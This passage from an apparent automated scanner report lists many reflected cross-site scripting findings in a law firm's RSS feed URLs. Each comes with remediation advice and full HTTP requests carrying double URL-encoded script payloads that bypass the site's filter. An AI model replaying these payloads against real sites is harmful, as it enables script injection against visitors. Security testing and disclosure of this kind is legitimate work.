Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsse654b"><script>alert(1)</script>d4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml" value="">
...[SNIP]...

4.224. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294 was submitted in the REST URL parameter 2. This input was echoed as 53a9f"><script>alert(1)</script>e2b7ff89294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices53a9f"><script>alert(1)</script>e2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml" value="">
...[SNIP]...

4.225. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229 was submitted in the REST URL parameter 3. This input was echoed as 705db"><script>alert(1)</script>4b5b4bac229 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Bankruptcy__Financial_Restructuring705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Bankruptcy__Financial_Restructuring705db"><script>alert(1)</script>4b5b4bac229/rss.xml" value="">
...[SNIP]...

4.226. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 was submitted in the REST URL parameter 4. This input was echoed as a7f92"><script>alert(1)</script>7324d443b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92"><script>alert(1)</script>7324d443b57" value="">
...[SNIP]...

4.227. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150 was submitted in the REST URL parameter 1. This input was echoed as 413f8"><script>alert(1)</script>89fd6730150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150/practices/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss413f8"><script>alert(1)</script>89fd6730150/practices/Communications/rss.xml" value="">
...[SNIP]...

4.228. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e was submitted in the REST URL parameter 2. This input was echoed as 3fe4c"><script>alert(1)</script>24c5c30db8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices3fe4c"><script>alert(1)</script>24c5c30db8e/Communications/rss.xml" value="">
...[SNIP]...

4.229. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2 was submitted in the REST URL parameter 3. This input was echoed as 21c62"><script>alert(1)</script>da39f0f31a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Communications21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Communications21c62"><script>alert(1)</script>da39f0f31a2/rss.xml" value="">
...[SNIP]...

4.230. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a was submitted in the REST URL parameter 4. This input was echoed as c659f"><script>alert(1)</script>72b7507567a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Communications/rss.xmlc659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Communications/rss.xmlc659f"><script>alert(1)</script>72b7507567a" value="">
...[SNIP]...

4.231. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650 was submitted in the REST URL parameter 1. This input was echoed as f366f"><script>alert(1)</script>a6a0233650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssf366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650/practices/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssf366f"><script>alert(1)</script>a6a0233650/practices/Corporate/rss.xml" value="">
...[SNIP]...

4.232. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb was submitted in the REST URL parameter 2. This input was echoed as 8174b"><script>alert(1)</script>fb0e9ce51eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices8174b"><script>alert(1)</script>fb0e9ce51eb/Corporate/rss.xml" value="">
...[SNIP]...

4.233. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b was submitted in the REST URL parameter 3. This input was echoed as 114fe"><script>alert(1)</script>550bbc6f87b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Corporate114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Corporate114fe"><script>alert(1)</script>550bbc6f87b/rss.xml" value="">
...[SNIP]...

4.234. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 was submitted in the REST URL parameter 4. This input was echoed as 6f9cb"><script>alert(1)</script>495b8d11a77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Corporate/rss.xml6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Corporate/rss.xml6f9cb"><script>alert(1)</script>495b8d11a77" value="">
...[SNIP]...

4.235. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f was submitted in the REST URL parameter 1. This input was echoed as d782d"><script>alert(1)</script>d2f1002c72f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssd782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssd782d"><script>alert(1)</script>d2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml" value="">
...[SNIP]...

4.236. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232 was submitted in the REST URL parameter 2. This input was echoed as 8ddc1"><script>alert(1)</script>11d8c833232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices8ddc1"><script>alert(1)</script>11d8c833232/Election_Law__Government_Ethics/rss.xml" value="">
...[SNIP]...

4.237. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3 was submitted in the REST URL parameter 3. This input was echoed as de06e"><script>alert(1)</script>97b01f23fb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Election_Law__Government_Ethicsde06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
